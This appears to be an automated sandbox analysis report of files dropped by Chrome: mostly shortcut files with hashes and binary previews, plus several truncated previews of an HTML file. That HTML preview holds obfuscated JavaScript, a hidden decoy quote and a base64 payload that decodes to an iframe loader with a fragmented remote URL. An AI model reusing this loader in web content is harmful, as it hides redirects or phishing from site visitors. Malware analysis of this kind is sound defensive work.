                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....%...*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............U.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 15:37:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2675
                                                                                                                                                                                                              Entropy (8bit):4.008492355484857
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:2081090048C48818DF9E7059988F26C9
                                                                                                                                                                                                              SHA1:1516A720ED5D5E068D05173008E4BC490122BF68
                                                                                                                                                                                                              SHA-256:A12D1914637857929041C23E03F36EDAC6DC68CBBF5A96B542FFE69BE199BDCF
                                                                                                                                                                                                              SHA-512:96F54A32F1A7227A80FE502647740CB1B01CD93838058EFAD2F9DB9EAD36EFFCDB46400078D76773F90AAF8142470E85E7E54E3D83B99F09DBA95BF27C6297D7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....G....*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............U.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2689
                                                                                                                                                                                                              Entropy (8bit):4.015518160296868
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:CB2F13A667547F3722B21CCB71A82268
                                                                                                                                                                                                              SHA1:FD833A775526C9C97E508B7C7D880116D59CD642
                                                                                                                                                                                                              SHA-256:FEEEE3DA6FE517DBC5F7615D47DA84CB1CB89D448E4FCE23B1F8C1609120A61D
                                                                                                                                                                                                              SHA-512:5E5D518BB3BA779D6CABC9E2EF5A3EE6BD7398079FF60500DF2A0AE1F460510063B91586650918A784480E32987ECC99F1C2731CFBDF09063036DD1072BF99D9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............U.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 15:37:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                                                              Entropy (8bit):4.008003624007643
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:1486A71A4EA2382D160EC22E3057B9C1
                                                                                                                                                                                                              SHA1:D3638F8BA2AAA1DA22FC0C07795AD8F912CFF919
                                                                                                                                                                                                              SHA-256:55E4E51B64C230597A91CFDFE6A776C32A7E73D038A1BEC334F4FD5C0B3EF479
                                                                                                                                                                                                              SHA-512:3FBAE62D68F2925D0E3E8FE39D896CEB78F95D351F4703F31BC41BD717133A5A894CD8C44B28D39C96F2333F99D26ADEFD4075195C71969F9BB82C8C56DE087D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....v...*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............U.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 15:37:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                                                              Entropy (8bit):3.994213682181409
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:37C1248F7889DEC4E670179ED5489EDA
                                                                                                                                                                                                              SHA1:54CF385028AB603CC6B5E007F1EF54C35125C11D
                                                                                                                                                                                                              SHA-256:0CD670D03B1250F317B74D94139DBCA0EC1B0CAD3EFDADD52DC3F3E912C3391E
                                                                                                                                                                                                              SHA-512:A6AFFD624341F8B3CD86DA6338A0F9D932E72A1C237A40C7B2FC449B910ECBE0B202AE3AAA9B3C5D659D800EE7CF60C31D87521A1FEB209BAD59AFAAC9525737
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,...._....*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............U.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 15:37:31 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                                                              Entropy (8bit):4.004559269881977
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:6C18D43FC0C284AE6B4ABB879C8C3AD0
                                                                                                                                                                                                              SHA1:EC337778A4967CA14423F06C075570D2F8178E28
                                                                                                                                                                                                              SHA-256:2A9CDC10D101565D0784045D973511F8F19FF28026C58529F603470D07099D74
                                                                                                                                                                                                              SHA-512:1DDFA4DA96FBA93B5FFA355816065505D13D3804B222810E51421193C79B02517958F39D5D127ABC3701FE5372CEAECFC25969125A8FFDC08A02682D3D165AE6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,....F....*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I^Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V^Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V^Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V^Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............U.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1952), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):0
                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:8ED8295A5F59D77FCCF351278E4F31C5
                                                                                                                                                                                                              SHA1:E1CD5411D332157CA3DE0C4B6A117737D3703661
                                                                                                                                                                                                              SHA-256:D46CB1DE808F903D5CC31B138264C12CBB63708DF982D96266101D5F884C230A
                                                                                                                                                                                                              SHA-512:919255F9210F6EAFF29AE1D3C4D26BA71EAC041BD95BE78740B52387A9209BC35C213A987A245D38EAA07E694CA812DF85C1C60A361563C5CFE1827E4114F049
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:..<h5 style='display:none;'>Don't be pushed around by the fears in your mind. Be led by the dreams in your heart. - Roy T. Bennett</h5>....<script>....function ngwZhnLEbj(otter, NxwpmwXzYZ) {var qIAaKYIuLT = FhqxgXoLOr();return ngwZhnLEbj = function (uMWgzaHPgz, gecko) { uMWgzaHPgz = uMWgzaHPgz - 0x0;var mullein = qIAaKYIuLT[uMWgzaHPgz];return mullein;}, ngwZhnLEbj(otter, NxwpmwXzYZ);}var otter = ngwZhnLEbj;function FhqxgXoLOr() {var NxwpmwXzYZ = ['ZG9jdW1lbnQud3JpdGUoYXRvYihgRFFvOGMyTnlhWEIwUGcwS0tHRnplVzVqSUNncElEMCtJSHNOQ2lBZ0lDQnNaWFFnYVdaeVlXMWxJRDBnWkc5amRXMWxiblF1WTNKbFlYUmxSV3hsYldWdWRDZ25hV1p5WVcxbEp5azdEUW9nSUNBZ2FXWnlZVzFsTG5OeVl5QTlXeUpvZEhSd0lpd2dMeW9nWW5KdlkyTnZiR2tnS2k4aWN6cGNMMXd2SWl3Z0x5b2diR1Z0YjI0Z0tpOGlURTlYTUNJc0lDOHFJQ0JvYjNKelpYSmhaR2x6YUNBZ0lDb3ZJbEZUV2pFaUxDQXZLaUI1WldGemRDQXFMeUpVUlRSRklpd2dMeW9nWW1GdVlXNWhJQ292SWxJNE16WWlMQ0F2S2lBZ1pHRnBhMjl1SUNvdklqY3lNak1pTENBdktpQnJZV3hsSUNvdklqVTVNVEVpTENBdktpQnJZV3RwSUNvdklrTTJRVE1pTENBdktpQjRhVzFsYm1saElDb3ZJaTVtWVc0aUx
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1952), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):0
                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:8ED8295A5F59D77FCCF351278E4F31C5
                                                                                                                                                                                                              SHA1:E1CD5411D332157CA3DE0C4B6A117737D3703661
                                                                                                                                                                                                              SHA-256:D46CB1DE808F903D5CC31B138264C12CBB63708DF982D96266101D5F884C230A
                                                                                                                                                                                                              SHA-512:919255F9210F6EAFF29AE1D3C4D26BA71EAC041BD95BE78740B52387A9209BC35C213A987A245D38EAA07E694CA812DF85C1C60A361563C5CFE1827E4114F049
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:..<h5 style='display:none;'>Don't be pushed around by the fears in your mind. Be led by the dreams in your heart. - Roy T. Bennett</h5>....<script>....function ngwZhnLEbj(otter, NxwpmwXzYZ) {var qIAaKYIuLT = FhqxgXoLOr();return ngwZhnLEbj = function (uMWgzaHPgz, gecko) { uMWgzaHPgz = uMWgzaHPgz - 0x0;var mullein = qIAaKYIuLT[uMWgzaHPgz];return mullein;}, ngwZhnLEbj(otter, NxwpmwXzYZ);}var otter = ngwZhnLEbj;function FhqxgXoLOr() {var NxwpmwXzYZ = ['ZG9jdW1lbnQud3JpdGUoYXRvYihgRFFvOGMyTnlhWEIwUGcwS0tHRnplVzVqSUNncElEMCtJSHNOQ2lBZ0lDQnNaWFFnYVdaeVlXMWxJRDBnWkc5amRXMWxiblF1WTNKbFlYUmxSV3hsYldWdWRDZ25hV1p5WVcxbEp5azdEUW9nSUNBZ2FXWnlZVzFsTG5OeVl5QTlXeUpvZEhSd0lpd2dMeW9nWW5KdlkyTnZiR2tnS2k4aWN6cGNMMXd2SWl3Z0x5b2diR1Z0YjI0Z0tpOGlURTlYTUNJc0lDOHFJQ0JvYjNKelpYSmhaR2x6YUNBZ0lDb3ZJbEZUV2pFaUxDQXZLaUI1WldGemRDQXFMeUpVUlRSRklpd2dMeW9nWW1GdVlXNWhJQ292SWxJNE16WWlMQ0F2S2lBZ1pHRnBhMjl1SUNvdklqY3lNak1pTENBdktpQnJZV3hsSUNvdklqVTVNVEVpTENBdktpQnJZV3RwSUNvdklrTTJRVE1pTENBdktpQjRhVzFsYm1saElDb3ZJaTVtWVc0aUx
                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1952), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2116
                                                                                                                                                                                                              Entropy (8bit):5.907401151001848
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                              MD5:8ED8295A5F59D77FCCF351278E4F31C5
                                                                                                                                                                                                              SHA1:E1CD5411D332157CA3DE0C4B6A117737D3703661
                                                                                                                                                                                                              SHA-256:D46CB1DE808F903D5CC31B138264C12CBB63708DF982D96266101D5F884C230A
                                                                                                                                                                                                              SHA-512:919255F9210F6EAFF29AE1D3C4D26BA71EAC041BD95BE78740B52387A9209BC35C213A987A245D38EAA07E694CA812DF85C1C60A361563C5CFE1827E4114F049
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                              Preview:..<h5 style='display:none;'>Don't be pushed around by the fears in your mind. Be led by the dreams in your heart. - Roy T. Bennett</h5>....<script>....function ngwZhnLEbj(otter, NxwpmwXzYZ) {var qIAaKYIuLT = FhqxgXoLOr();return ngwZhnLEbj = function (uMWgzaHPgz, gecko) { uMWgzaHPgz = uMWgzaHPgz - 0x0;var mullein = qIAaKYIuLT[uMWgzaHPgz];return mullein;}, ngwZhnLEbj(otter, NxwpmwXzYZ);}var otter = ngwZhnLEbj;function FhqxgXoLOr() {var NxwpmwXzYZ = ['ZG9jdW1lbnQud3JpdGUoYXRvYihgRFFvOGMyTnlhWEIwUGcwS0tHRnplVzVqSUNncElEMCtJSHNOQ2lBZ0lDQnNaWFFnYVdaeVlXMWxJRDBnWkc5amRXMWxiblF1WTNKbFlYUmxSV3hsYldWdWRDZ25hV1p5WVcxbEp5azdEUW9nSUNBZ2FXWnlZVzFsTG5OeVl5QTlXeUpvZEhSd0lpd2dMeW9nWW5KdlkyTnZiR2tnS2k4aWN6cGNMMXd2SWl3Z0x5b2diR1Z0YjI0Z0tpOGlURTlYTUNJc0lDOHFJQ0JvYjNKelpYSmhaR2x6YUNBZ0lDb3ZJbEZUV2pFaUxDQXZLaUI1WldGemRDQXFMeUpVUlRSRklpd2dMeW9nWW1GdVlXNWhJQ292SWxJNE16WWlMQ0F2S2lBZ1pHRnBhMjl1SUNvdklqY3lNak1pTENBdktpQnJZV3hsSUNvdklqVTVNVEVpTENBdktpQnJZV3RwSUNvdklrTTJRVE1pTENBdktpQjRhVzFsYm1saElDb3ZJaTVtWVc0aUx
                                                                                                                                                                                                              No static file info